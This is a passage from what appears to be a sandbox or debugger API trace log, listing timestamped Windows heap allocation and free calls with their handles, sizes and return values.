dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 